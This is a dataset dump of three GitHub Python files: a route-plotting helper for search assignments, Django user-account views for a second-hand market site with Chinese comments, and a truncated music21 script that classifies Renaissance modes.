adjacency_list[node1].append(node2)\n else:\n adjacency_list[node1] = [node2]\n\n if node2 in adjacency_list:\n adjacency_list[node2].append(node1)\n else:\n adjacency_list[node2] = [node1]\n\n return adjacency_list\n\ndef read_coordinates(filename):\n coordinates = {}\n\n with open(filename, 'r') as file:\n for line in file:\n city, latitude, longitude = line.strip().split(',')\n coordinates[city] = [float(latitude.strip()), float(longitude.strip())]\n\n return coordinates\n\n\ndef show_graph(adjacency_list, node_colors, route_nodes):\n\n # Change the node color for every visited node\n for i, route_node in enumerate(route_nodes):\n if i == 0:\n node_colors[route_node] = 'green'\n elif i == len(route_nodes) - 1:\n node_colors[route_node] = 'orange'\n else:\n node_colors[route_node] = 'red'\n\n # Change the edge color for each consecutive pair of nodes on the route\n edge_colors = {}\n for i, route_node in enumerate(route_nodes):\n if i < len(route_nodes) - 1:\n edge_colors[(route_node, route_nodes[i + 1])] = 'red'\n\n G = nx.DiGraph()\n for node, neighbors in adjacency_list.items():\n G.add_node(node)\n for neighbor in neighbors:\n G.add_edge(node, neighbor)\n\n # Plot the graph using Kamada-Kawai layout\n plt.figure(figsize=(12, 8))\n\n plt.subplot(122)\n pos = 
nx.kamada_kawai_layout(G)\n nx.draw(\n G, \n pos, \n with_labels=True, \n node_size=500, \n font_size=4, \n font_color='white', \n node_color=[node_colors[node] for node in G.nodes()],\n edge_color=[edge_colors.get(edge, 'black') for edge in G.edges()])\n\n plt.tight_layout()\n plt.show()", "repo_name": "agussusanto18/AI_Assignments_Search_Methods", "sub_path": "utils.py", "file_name": "utils.py", "file_ext": "py", "file_size_in_byte": 2701, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "86", "api": [{"api_name": "math.sin", "line_number": 15, "usage_type": "call"}, {"api_name": "math.radians", "line_number": 15, "usage_type": "call"}, {"api_name": "math.cos", "line_number": 16, "usage_type": "call"}, {"api_name": "math.radians", "line_number": 16, "usage_type": "call"}, {"api_name": "math.sin", "line_number": 17, "usage_type": "call"}, {"api_name": "math.radians", "line_number": 17, "usage_type": "call"}, {"api_name": "math.atan2", "line_number": 18, "usage_type": "call"}, {"api_name": "math.sqrt", "line_number": 18, "usage_type": "call"}, {"api_name": "networkx.DiGraph", "line_number": 68, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 75, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 75, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 77, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 77, "usage_type": "name"}, {"api_name": "networkx.kamada_kawai_layout", "line_number": 78, "usage_type": "call"}, {"api_name": "networkx.draw", "line_number": 79, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.tight_layout", "line_number": 89, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 89, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 90, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 90, "usage_type": "name"}]} +{"seq_id": "71271964444", "text": "import re\r\nfrom django.core.mail import send_mail # send emails\r\nfrom django.contrib.auth import authenticate, login, logout # authenticate users\r\nfrom django.core.paginator import Paginator\r\nfrom django.http import HttpResponse\r\nfrom django.views import View # class-based views\r\nfrom django.shortcuts import render, redirect # redirect is the method used to jump to another page\r\nfrom django.urls import reverse # reverse resolves a page's URL from its name\r\nfrom user.models import User, Address\r\nfrom itsdangerous import TimedJSONWebSignatureSerializer as Serializer # time-limited activation module, renamed here\r\nfrom SecondHandMarket import settings\r\nfrom itsdangerous import SignatureExpired # exception raised when the activation window expires\r\nfrom order.models import OrderGoods, OrderInfo\r\nfrom celery_tasks.tasks import send_register_active_email # import the async task used to send the activation email\r\nfrom utils.mixin import LoginRequiredMixin # mixin for views that require login\r\nfrom django_redis import get_redis_connection # connect to redis\r\nfrom goods.models import GoodsSKU\r\n# use class-based views to handle page rendering\r\n# registration page view\r\nclass RegisterView(View): # inherits View so that urls.py can expose this class through its default as_view() method\r\n # a GET request calls get(), a POST request calls post()\r\n # the handling differs depending on whether the request is GET or POST\r\n def get(self, request): # inside View.as_view() the GET method name is lowercased to get, so this method handles GET requests\r\n # show the registration page\r\n return render(request, 'register.html')\r\n # the method below must be named post, because POST is lowercased to post\r\n def post(self, request):\r\n # handle the registration\r\n # receive the data\r\n username = request.POST.get('user_name')\r\n password = request.POST.get('pwd')\r\n cpassword = request.POST.get('cpwd')\r\n email = request.POST.get('email')\r\n allow = request.POST.get('allow')\r\n\r\n # validate the data\r\n if not all([username, 
password, email]): # all()函数对于其中的迭代对象只有全部迭代才会返回true\n # 数据不完整\n return render(request, 'register.html', {'errmsg': '数据不完整'})\n\n # 校验邮箱\n # 用于判断邮箱格式的正则表达式\n if not re.match(r'^[a-z0-9][\\w.\\-]*@[a-z0-9\\-]+(\\.[a-z]{2,5}){1,2}$', email):\n return render(request, 'register.html', {'errmsg': '邮箱格式不正确'})\n\n if allow != 'on':\n return render(request, 'register.html', {'errmsg': '请同意协议'})\n\n # 校验用户名是否重复\n try:\n # get方法只能返回一条数据,如果查询不到则返回一个DoesNotExist的错误\n user = User.objects.get(username=username) # 第一个username是表达中的属性,第二个username为接收到的username\n except User.DoesNotExist:\n # 用户名不存在\n user = None\n\n if user:\n # 用户名已存在\n return render(request, 'register.html', {'errmsg': '用户名已存在'})\n # 判断两次的密码是否一致\n if cpassword != password:\n return render(request, 'register.html', {'errmsg': '两次输入的密码不一致'})\n\n # 进行业务处理: 进行用户注册\n user = User.objects.create_user(username, email, password) # 通过Django自带的create_user方法来写入,注意顺序不能错\n user.is_active = 0 # 这里的user就是注册的用户,对注册用户默认设置为不激活,后面通过邮箱来进行激活\n user.save()\n # 通过邮件发送激活地址来激活用户的账户\n # 激活地址为http://127.0.0.1:8000/user/active/user_id\n '''user_id是在user表中用户的id,每个用户具有唯一性,为了防止恶意激活(判断这个是id从而激活其他用户),\n 需要将user_id进行加密,这里通过itsdangerous包来进行带有时效性的加密'''\n # 加密\n serializer = Serializer(settings.SECRET_KEY, 3600)\n info = {'confirm':user.id} # 定义一个字典用来存放id\n # f = open('token.txt', 'a')\n token = serializer.dumps(info).decode() # dump进行加密,加密的为byte格式,前面会有一个b\n # decode()将byte格式转换为字符串格式\n # 发邮件\n send_register_active_email.delay(email, username, token) # 使用delay函数将发送邮件的任务放到异步处理器,括号内为要传递的参数\n # 返回应答, 跳转到首页\n return redirect(reverse('goods:index')) # 通过反向解析获得地址从而来跳转页面\n# 激活界面视图\nclass ActiveView(View):\n def get(self, request, token):\n # 不管加密还是解密都需要写下面的对象\n serializer = Serializer(settings.SECRET_KEY, 3600) # 前者表示加密的秘钥,可以随意设置,这里设置为django默认的一种秘钥,3600表示激活时间为3600秒\n try:\n info = serializer.loads(token) # 对token进行解密\n user_id = info['confirm'] # 获取解密后的user_id\n # 根据用户id来获取用户的信息并激活用户\n user = User.objects.get(id=user_id)\n user.is_active = 1\n user.save()\n # 激活成功后跳转到登录界面\n return redirect(reverse('user:login'))\n except SignatureExpired as e:\n # 表明激活时间已过\n return HttpResponse('激活链接已过期')\n# 登录界面视图\nclass LoginView(View):\n def get(self, request):\n # 判断是否记录了用户名\n if 'username' in request.COOKIES:\n username = request.COOKIES.get('username')\n checked = 'checked'\n else:\n username = ''\n checked = ''\n return render(request, 'login.html', {'username':username, 'checked':checked})\n\n def post(self, request):\n # 接受数据\n username = request.POST.get('username')\n pwd = request.POST.get('pwd')\n # 判断数据是否全部接受\n if all([username, pwd]):\n # 校验数据,使用django内置的校验系统进行校验\n user = authenticate(username=username, password=pwd)\n if user is not None:\n # 验证成功,使用Django内部的用户登录来记录用户的登录状态\n # 判断用户是否激活\n if user.is_active:\n # 记录用户的登录状态\n login(request, user)\n # 获取登录后索要跳转到的地址\n '''例如用户信息界面如何用户没有登录在页面中输入相关的网址不能直接跳转到用户信息界面,\n 要跳转到指定的界面,这里指定的界面后面有next,且next后面的地址就是用户信息界面'''\n next_url = request.GET.get('next', reverse('goods:index')) # 如果没有得到next值,next_url默认赋值为goods:index反向解析的网址\n # 带着登录状态跳转到next_url页面,默认跳转到首页\n response = redirect(next_url)\n # 判断是否需要记住用户名\n remember = request.POST.get('remember')\n if remember == 'on':\n # 需要记住用户名\n response.set_cookie('username', username, max_age=7*24*3600) # 设置过期时间为一周\n else:\n response.delete_cookie('username')\n return response\n\n\n\n else:\n # 用户未激活\n return render(request, 'login.html', {'errmsg':'用户未激活'})\n\n else:\n # 判断用户是否注册\n try:\n user = User.objects.get(username=username)\n return render(request, 'login.html', {'errmsg':'密码不正确'})\n except 
User.DoesNotExist:\n return render(request, 'login.html', {'errmsg':'用户尚未注册'})\n\n\n # No backend authenticated the credentials\n\n else:\n return render(request, 'login.html', {'errmsg':'用户名或密码没有填写'})\n# /user/logout\nclass LogoutView(View):\n # log out\n def get(self, request):\n # clear the user's session\n logout(request)\n # redirect to the home page\n return redirect(reverse('goods:index'))\n# /user\nclass UserInfoView(LoginRequiredMixin, View): # the order of these two base classes must not be swapped, or it may error\n '''user center - info page'''\n def get(self, request):\n '''display'''\n\n\n # get the user's personal information\n user = request.user\n address = Address.objects.get_default_address(user) # returns all user-related info, not only the address\n\n # get the user's browsing history\n # from redis import StrictRedis\n # sr = StrictRedis(host='192.168.40.128', port='6379', db=9)\n con = get_redis_connection('default') # get the default connection\n\n history_key = 'history_%d'%user.id\n\n # get the ids of the 5 goods the user viewed most recently\n sku_ids = con.lrange(history_key, 0, 4) # returns a list, indices 0 to 4, most recent first\n\n # query the database for the details of the viewed goods\n # goods_li = GoodsSKU.objects.filter(id__in=sku_ids) # finds ids contained in sku_ids, but outputs in id order rather than the sku_ids order\n\n # goods_res = []\n # for a_id in sku_ids:\n # for goods in goods_li:\n # if a_id == goods.id:\n # goods_res.append(goods)\n\n # iterate to fetch the viewed goods' info in browsing order\n goods_li = []\n for id in sku_ids:\n goods = GoodsSKU.objects.get(id=id)\n goods_li.append(goods)\n\n # build the context\n context = {'page':'user',\n 'address':address,\n 'goods_li':goods_li}\n\n # Django adds a request.user attribute to the request object\n # if the user is not logged in -> user is an AnonymousUser instance\n # if the user is logged in -> user is a User instance\n # request.user.is_authenticated()\n # besides the template variables you pass, django also hands request.user to the template file, where user.is_authenticated can be called directly to check login\n return render(request, 'user_center_info.html', context)\n\n# /user/order\nclass UserOrderView(LoginRequiredMixin, View):\n '''user center - orders page'''\n def get(self, request, page):\n '''display'''\n # get the user's orders\n user = request.user\n orders = OrderInfo.objects.filter(user=user).order_by('-create_time')\n\n # iterate to fetch each order's goods\n for order in orders:\n # query the order's goods by order_id\n order_skus = OrderGoods.objects.filter(order_id=order.order_id)\n\n # iterate order_skus to compute each item's subtotal\n for order_sku in order_skus:\n # compute the subtotal\n amount = order_sku.count * order_sku.price\n # dynamically attach an amount attribute to order_sku to store the subtotal\n order_sku.amount = amount\n\n # dynamically attach the order status title to order\n order.status_name = OrderInfo.ORDER_STATUS[order.order_status]\n # dynamically attach the goods info to order\n order.order_skus = order_skus\n\n # paginate\n paginator = Paginator(orders, 1)\n\n # get the contents of page `page`\n try:\n page = int(page)\n except Exception as e:\n page = 1\n\n if page > paginator.num_pages:\n page = 1\n\n # get the Page instance for page `page`\n order_page = paginator.page(page)\n\n # todo: control the page numbers; show at most 5 on the page\n # 1. fewer than 5 total pages: show all of them\n # 2. current page within the first 3: show pages 1-5\n # 3. current page within the last 3: show the last 5 pages\n # 4. otherwise: show the 2 pages before, the current page, and the 2 pages after\n num_pages = paginator.num_pages\n if num_pages < 5:\n pages = range(1, num_pages + 1)\n elif page <= 3:\n pages = range(1, 6)\n elif num_pages - page <= 2:\n pages = range(num_pages - 4, num_pages + 1)\n else:\n pages = range(page - 2, page + 3)\n\n # build the context\n context = {'order_page': order_page,\n 'pages': pages,\n 'page': 'order'}\n\n # render the template\n return render(request, 'user_center_order.html', context)\n\n\n# /user/address\nclass AddressView(LoginRequiredMixin, View):\n '''user center - address page'''\n def get(self, request):\n '''display'''\n # get the User object for the logged-in user\n user = request.user\n\n # get the user's default shipping address\n # try:\n # address = Address.objects.get(user=user, is_default=True) # models.Manager\n # except Address.DoesNotExist:\n # # no default shipping address exists\n # address = None\n address = Address.objects.get_default_address(user)\n\n # render the template\n return 
render(request, 'user_center_site.html', {'page':'address', 'address':address})\n\n def post(self, request):\n '''add an address'''\n # receive the data\n receiver = request.POST.get('receiver')\n addr = request.POST.get('addr')\n zip_code = request.POST.get('zip_code')\n phone = request.POST.get('phone')\n\n # validate the data\n if not all([receiver, addr, phone]):\n return render(request, 'user_center_site.html', {'errmsg':'数据不完整'})\n\n # validate the phone number\n if not re.match(r'^1[3|4|5|7|8][0-9]{9}$', phone):\n return render(request, 'user_center_site.html', {'errmsg':'手机格式不正确'})\n\n # business logic: add the address\n # if the user already has a default shipping address, the new address is not made the default; otherwise it becomes the default\n # get the User object for the logged-in user\n user = request.user\n\n # try:\n # address = Address.objects.get(user=user, is_default=True)\n # except Address.DoesNotExist:\n # # no default shipping address exists\n # address = None\n\n address = Address.objects.get_default_address(user)\n\n if address:\n is_default = False\n else:\n is_default = True\n\n # add the address\n Address.objects.create(user=user,\n receiver=receiver,\n addr=addr,\n zip_code=zip_code,\n phone=phone,\n is_default=is_default)\n\n # respond and refresh the address page\n return redirect(reverse('user:address')) # GET request\n\n", "repo_name": "DedicationTechnology/SecondHandMarket", "sub_path": "apps/user/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 15385, "program_lang": "python", "lang": "zh", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "86", "api": [{"api_name": "django.views.View", "line_number": 20, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 25, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 39, "usage_type": "call"}, {"api_name": "re.match", "line_number": 43, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 44, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 47, "usage_type": "call"}, {"api_name": "user.models", "line_number": 52, "usage_type": "name"}, {"api_name": "user.models.User.objects.get", "line_number": 52, "usage_type": "call"}, {"api_name": "user.models.User.objects", "line_number": 52, "usage_type": "attribute"}, {"api_name": "user.models.User", "line_number": 52, "usage_type": "name"}, {"api_name": "user.models.User.DoesNotExist", "line_number": 53, "usage_type": "attribute"}, {"api_name": "user.models.User", "line_number": 53, "usage_type": "name"}, {"api_name": "user.models", "line_number": 55, "usage_type": "name"}, {"api_name": "user.models", "line_number": 57, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 59, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 62, "usage_type": "call"}, {"api_name": "user.models", "line_number": 65, "usage_type": "name"}, {"api_name": "user.models.User.objects.create_user", "line_number": 65, "usage_type": "call"}, {"api_name": "user.models.User.objects", "line_number": 65, "usage_type": "attribute"}, {"api_name": "user.models.User", "line_number": 65, "usage_type": "name"}, {"api_name": "user.models.is_active", "line_number": 66, "usage_type": "attribute"}, {"api_name": "user.models", "line_number": 66, "usage_type": "name"}, {"api_name": "user.models.save", "line_number": 67, "usage_type": "call"}, {"api_name": "user.models", "line_number": 67, "usage_type": "name"}, {"api_name": "itsdangerous.TimedJSONWebSignatureSerializer", "line_number": 73, "usage_type": "call"}, {"api_name": "SecondHandMarket.settings.SECRET_KEY", "line_number": 73, "usage_type": "attribute"}, {"api_name": "SecondHandMarket.settings", "line_number": 
73, "usage_type": "name"}, {"api_name": "user.models.id", "line_number": 74, "usage_type": "attribute"}, {"api_name": "user.models", "line_number": 74, "usage_type": "name"}, {"api_name": "celery_tasks.tasks.send_register_active_email.delay", "line_number": 79, "usage_type": "call"}, {"api_name": "celery_tasks.tasks.send_register_active_email", "line_number": 79, "usage_type": "name"}, {"api_name": "django.shortcuts.redirect", "line_number": 81, "usage_type": "call"}, {"api_name": "django.urls.reverse", "line_number": 81, "usage_type": "call"}, {"api_name": "django.views.View", "line_number": 83, "usage_type": "name"}, {"api_name": "itsdangerous.TimedJSONWebSignatureSerializer", "line_number": 86, "usage_type": "call"}, {"api_name": "SecondHandMarket.settings.SECRET_KEY", "line_number": 86, "usage_type": "attribute"}, {"api_name": "SecondHandMarket.settings", "line_number": 86, "usage_type": "name"}, {"api_name": "user.models", "line_number": 91, "usage_type": "name"}, {"api_name": "user.models.User.objects.get", "line_number": 91, "usage_type": "call"}, {"api_name": "user.models.User.objects", "line_number": 91, "usage_type": "attribute"}, {"api_name": "user.models.User", "line_number": 91, "usage_type": "name"}, {"api_name": "user.models.is_active", "line_number": 92, "usage_type": "attribute"}, {"api_name": "user.models", "line_number": 92, "usage_type": "name"}, {"api_name": "user.models.save", "line_number": 93, "usage_type": "call"}, {"api_name": "user.models", "line_number": 93, "usage_type": "name"}, {"api_name": "django.shortcuts.redirect", "line_number": 95, "usage_type": "call"}, {"api_name": "django.urls.reverse", "line_number": 95, "usage_type": "call"}, {"api_name": "itsdangerous.SignatureExpired", "line_number": 96, "usage_type": "name"}, {"api_name": "django.http.HttpResponse", "line_number": 98, "usage_type": "call"}, {"api_name": "django.views.View", "line_number": 100, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 109, "usage_type": "call"}, {"api_name": "user.models", "line_number": 118, "usage_type": "name"}, {"api_name": "django.contrib.auth.authenticate", "line_number": 118, "usage_type": "call"}, {"api_name": "user.models", "line_number": 119, "usage_type": "name"}, {"api_name": "user.models.is_active", "line_number": 122, "usage_type": "attribute"}, {"api_name": "user.models", "line_number": 122, "usage_type": "name"}, {"api_name": "django.contrib.auth.login", "line_number": 124, "usage_type": "call"}, {"api_name": "user.models", "line_number": 124, "usage_type": "argument"}, {"api_name": "django.urls.reverse", "line_number": 128, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 130, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 144, "usage_type": "call"}, {"api_name": "user.models", "line_number": 149, "usage_type": "name"}, {"api_name": "user.models.User.objects.get", "line_number": 149, "usage_type": "call"}, {"api_name": "user.models.User.objects", "line_number": 149, "usage_type": "attribute"}, {"api_name": "user.models.User", "line_number": 149, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 150, "usage_type": "call"}, {"api_name": "user.models.User.DoesNotExist", "line_number": 151, "usage_type": "attribute"}, {"api_name": "user.models.User", "line_number": 151, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 152, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 158, 
"usage_type": "call"}, {"api_name": "django.views.View", "line_number": 160, "usage_type": "name"}, {"api_name": "django.contrib.auth.logout", "line_number": 164, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 166, "usage_type": "call"}, {"api_name": "django.urls.reverse", "line_number": 166, "usage_type": "call"}, {"api_name": "utils.mixin.LoginRequiredMixin", "line_number": 168, "usage_type": "name"}, {"api_name": "django.views.View", "line_number": 168, "usage_type": "name"}, {"api_name": "user.models", "line_number": 175, "usage_type": "name"}, {"api_name": "user.models.Address.objects.get_default_address", "line_number": 176, "usage_type": "call"}, {"api_name": "user.models", "line_number": 176, "usage_type": "argument"}, {"api_name": "user.models.Address.objects", "line_number": 176, "usage_type": "attribute"}, {"api_name": "user.models.Address", "line_number": 176, "usage_type": "name"}, {"api_name": "django_redis.get_redis_connection", "line_number": 181, "usage_type": "call"}, {"api_name": "user.models.id", "line_number": 183, "usage_type": "attribute"}, {"api_name": "user.models", "line_number": 183, "usage_type": "name"}, {"api_name": "goods.models", "line_number": 200, "usage_type": "name"}, {"api_name": "goods.models.GoodsSKU.objects.get", "line_number": 200, "usage_type": "call"}, {"api_name": "goods.models.GoodsSKU.objects", "line_number": 200, "usage_type": "attribute"}, {"api_name": "goods.models.GoodsSKU", "line_number": 200, "usage_type": "name"}, {"api_name": "goods.models", "line_number": 201, "usage_type": "argument"}, {"api_name": "django.shortcuts.render", "line_number": 213, "usage_type": "call"}, {"api_name": "utils.mixin.LoginRequiredMixin", "line_number": 216, "usage_type": "name"}, {"api_name": "django.views.View", "line_number": 216, "usage_type": "name"}, {"api_name": "user.models", "line_number": 221, "usage_type": "name"}, {"api_name": "order.models.OrderInfo.objects.filter", "line_number": 222, "usage_type": "call"}, {"api_name": "order.models.OrderInfo.objects", "line_number": 222, "usage_type": "attribute"}, {"api_name": "order.models.OrderInfo", "line_number": 222, "usage_type": "name"}, {"api_name": "user.models", "line_number": 222, "usage_type": "name"}, {"api_name": "order.models", "line_number": 225, "usage_type": "name"}, {"api_name": "order.models.OrderGoods.objects.filter", "line_number": 227, "usage_type": "call"}, {"api_name": "order.models.OrderGoods.objects", "line_number": 227, "usage_type": "attribute"}, {"api_name": "order.models.OrderGoods", "line_number": 227, "usage_type": "name"}, {"api_name": "order.models.order_id", "line_number": 227, "usage_type": "attribute"}, {"api_name": "order.models", "line_number": 227, "usage_type": "name"}, {"api_name": "order.models.status_name", "line_number": 237, "usage_type": "attribute"}, {"api_name": "order.models", "line_number": 237, "usage_type": "name"}, {"api_name": "order.models.OrderInfo.ORDER_STATUS", "line_number": 237, "usage_type": "attribute"}, {"api_name": "order.models.OrderInfo", "line_number": 237, "usage_type": "name"}, {"api_name": "order.models.order_status", "line_number": 237, "usage_type": "attribute"}, {"api_name": "order.models.order_skus", "line_number": 239, "usage_type": "attribute"}, {"api_name": "order.models", "line_number": 239, "usage_type": "name"}, {"api_name": "django.core.paginator.Paginator", "line_number": 242, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 277, "usage_type": "call"}, {"api_name": 
"utils.mixin.LoginRequiredMixin", "line_number": 281, "usage_type": "name"}, {"api_name": "django.views.View", "line_number": 281, "usage_type": "name"}, {"api_name": "user.models", "line_number": 286, "usage_type": "name"}, {"api_name": "user.models.Address.objects.get_default_address", "line_number": 294, "usage_type": "call"}, {"api_name": "user.models", "line_number": 294, "usage_type": "argument"}, {"api_name": "user.models.Address.objects", "line_number": 294, "usage_type": "attribute"}, {"api_name": "user.models.Address", "line_number": 294, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 297, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 309, "usage_type": "call"}, {"api_name": "re.match", "line_number": 312, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 313, "usage_type": "call"}, {"api_name": "user.models", "line_number": 318, "usage_type": "name"}, {"api_name": "user.models.Address.objects.get_default_address", "line_number": 326, "usage_type": "call"}, {"api_name": "user.models", "line_number": 326, "usage_type": "argument"}, {"api_name": "user.models.Address.objects", "line_number": 326, "usage_type": "attribute"}, {"api_name": "user.models.Address", "line_number": 326, "usage_type": "name"}, {"api_name": "user.models.Address.objects.create", "line_number": 334, "usage_type": "call"}, {"api_name": "user.models.Address.objects", "line_number": 334, "usage_type": "attribute"}, {"api_name": "user.models.Address", "line_number": 334, "usage_type": "name"}, {"api_name": "user.models", "line_number": 334, "usage_type": "name"}, {"api_name": "django.shortcuts.redirect", "line_number": 342, "usage_type": "call"}, {"api_name": "django.urls.reverse", "line_number": 342, "usage_type": "call"}]} +{"seq_id": "2891023250", "text": "from collections import Counter\nimport re\nfrom music21 import *\nfrom sklearn.preprocessing import MinMaxScaler\nimport statistics\nimport numpy as np\nfrom base import OrderedCounter\n\n#predominancia de movimiento descendente???\n\ndef count_intervals(s):\n ntbefore = None\n\n for num, i in enumerate(obj):\n \n if isinstance(i, note.Rest):\n cnt = cnt + 1\n tmp_string.append('=P')\n \n elif isinstance(i, note.Note):\n cnt = cnt + 1\n if ntbefore is None:\n ntbefore = i.pitch.name\n else:\n inv = interval.Interval(note.Note(ntbefore), note.Note(i.pitch.name))\n invs = inv.semitones\n if invs > 0:\n invs = '+' + str(invs)\n elif invs == 0:\n invs = '=' + str(invs)\n else:\n invs = str(invs)\n tmp_string.append(invs)\n ntbefore = i.pitch.name\n \n elif isinstance(i, chord.Chord):\n cnt = cnt + 1\n ch = i.getChordStep(1).name\n inv = interval.Interval(note.Note(ntbefore), ch)\n invs = inv.semitones\n tmp_string.append(invs)\n ntbefore = ch\n\n else:\n if isinstance(i, stream.Part):\n if num == 0:\n continue\n \n else:\n cnt = 0\n ngram_list.append(tmp_string)\n tmp_string = list()\n continue\n\n else:\n pass\n\n ngram_list.append(tmp_string)\n\n for i in ngram_list:\n voice = seq_ngrams(i, number_grams)\n idx = ngram_list.index(i)\n ngram_list.pop(idx)\n ngram_list.insert(idx, voice)\n\n\n # Lo siguiente va en el cuaderno\n\n dict1 = Counter(ngram_list[0])\n dict2 = Counter(ngram_list[1])\n dict3 = Counter(ngram_list[2])\n dict4 = Counter(ngram_list[3])\n\n print(dict1.most_common()[-1])\n\ndef rec_notas(s, finalis):\n\n snotes = sorted([x.name for x in s.recurse().getElementsByClass('Note')])\n notes_ordered = list()\n tmp = list()\n cond = False\n\n for i in snotes:\n 
if cond is False:\n if i == finalis:\n cond = True\n notes_ordered.append(i)\n else:\n tmp.append(i)\n else:\n notes_ordered.append(i)\n\n if len(tmp) > 0:\n notes_ordered = notes_ordered + tmp\n else:\n pass\n\n\n nt_dict = OrderedCounter(notes_ordered)\n\n return nt_dict\n\ndef ambito(s):\n amb = analysis.discrete.Ambitus(s)\n amb = amb.getPitchSpan(s)\n result = amb[0].nameWithOctave + ' - ' + amb[1].nameWithOctave\n if interval.Interval(amb[0].nameWithOctave, amb[1].nameWithOctave).semitones <= 33:\n return result, 'a voce piena'\n else: return result, 'ad aequales'\n\ndef ambito_per_voice(score, x):\n dct = {'superius': 0, 'altus': 1, 'tenor': 2, 'bassus': 3}\n part = score.parts[dct[x]]\n amb = analysis.discrete.Ambitus(part)\n amb = amb.getPitchSpan(part)\n return [amb[0], amb[1]]\n\ndef get_finalis(s):\n\n sc = s.chordify()\n schords = sc.recurse().getElementsByClass('Chord')\n finalis = schords[-1].getChordStep(1)\n return finalis\n\ndef armadura(s):\n alt = [i.name for i in s[key.KeySignature].first().alteredPitches]\n return alt\n\ndef armadura_comparada(s, x):\n s = s.recurse().getElementsByClass('Note')\n count = {}\n for z in x:\n weight_alt = 0\n weight_nat = 0\n for i in s:\n nm = i.name\n nm_natural = i.name[0]\n\n if nm == z:\n weight_alt = float(weight_alt) + i.quarterLength\n count[z] = weight_alt\n \n if nm_natural == z:\n weight_nat = float(weight_nat) + i.quarterLength \n count[z] = weight_nat\n\n if weight_alt >= weight_nat:\n pass\n else:\n x.remove(z)\n x.append(z[0])\n return x\n\ndef intervals(alt, natural_scale, finalis):\n scale = list()\n lst_ordered = list()\n if len(alt) == 0:\n index = natural_scale.index(finalis)\n lst_ordered = natural_scale[index:] + natural_scale[:index]\n else:\n alt_type = alt[0][-1]\n tmp = [i[:1] for i in alt]\n for i in natural_scale:\n if i in tmp: scale.append(i + alt_type)\n else: scale.append(i)\n\n index = scale.index(finalis)\n lst_ordered = list(scale[index:] + scale[:index])\n\n intervals = [interval.Interval(note.Note(x), note.Note(lst_ordered[n+1])).semitones\\\n for n, x in enumerate(lst_ordered) if n < len(lst_ordered)-1]\n \n if -10 in intervals:\n idx = intervals.index(-10)\n intervals[idx] = 2\n elif -11 in intervals:\n idx = intervals.index(-11)\n intervals[idx] = 1\n\n return [intervals, lst_ordered]\n\n\ndef calcs_mode(s, alt, natural_scale, natural_mode, finalis, mode_basis, transposed=None):\n \n lst_ordered = intervals(alt, natural_scale, finalis)[1]\n #conditionals checking the ambitus of the tenor and of the soprano\n #when the mode is authentic\n tenor_lowest = ambito_per_voice(s, 'tenor')[0]\n soprano_lowest = ambito_per_voice(s, 'superius')[0]\n\n if tenor_lowest.name == finalis or soprano_lowest.name == finalis:\n if mode_basis is False:\n return natural_mode[finalis]\n else:\n return str(transposed) + f' sobre {finalis}'\n \n elif tenor_lowest.name == lst_ordered[-1] or\\\n soprano_lowest.name == lst_ordered[-1]:\n if mode_basis is False:\n return natural_mode[finalis]\n else:\n return str(transposed) + f' sobre {finalis}'\n\n \n #to leave room for plagal modes.\n #distinguish plagal tetrardus from authentic protus.\n elif tenor_lowest.name in lst_ordered[3:5] or\\\n soprano_lowest.name in lst_ordered[3:5]:\n if mode_basis is False:\n return natural_mode[finalis] + ' plagal'\n else:\n if transposed == 'Protus':\n transposed = 'Tetrardus plagal'\n return str(transposed) + f' sobre {finalis}'\n else: return str(transposed) + f' sobre {finalis}'\n\n
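#special case: an F final whose lowest tenor or superius note is B-flat\n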
elif finalis == 'F' and tenor_lowest.name == 'B-'\\\n or finalis == 'F' and soprano_lowest.name == 'B-':\n if mode_basis is False:\n return natural_mode[finalis]\n else:\n if transposed == 'Protus':\n transposed = 'Tetrardus plagal'\n return str(transposed) + f' sobre {finalis}'\n else: return str(transposed) + f' sobre {finalis}'\n\n\ndef get_mode(s, finalis):\n natural_scale = ['C', 'D', 'E', 'F', 'G', 'A', 'B']\n modes = {\"[2, 1, 2, 2, 2, 1]\": 'Protus', \"[2, 1, 2, 2, 1, 2]\": 'Protus plagal', \"[1, 2, 2, 2, 1, 2]\": 'Deuterus', \"[1, 2, 2, 1, 2, 2]\": 'Deuterus plagal',\\\n \"[2, 2, 2, 1, 2, 2]\": 'Tritus', \"[2, 2, 1, 2, 2, 2]\": 'Tritus plagal', \"[2, 2, 1, 2, 2, 1]\": 'Tetrardus'}\n natural_mode = {'D': 'Protus', 'E': 'Deuterus', 'F': 'Tritus', 'G': 'Tetrardus'}\n alt = armadura_comparada(s, armadura(s))\n \n if len(alt) == 0:\n try:\n calcs = calcs_mode(s, alt, natural_scale, natural_mode, finalis, mode_basis=False)\n return calcs\n except:\n try:\n ivls = intervals(alt, natural_scale, finalis)\n tr = modes[str(ivls[0])]\n calcs = 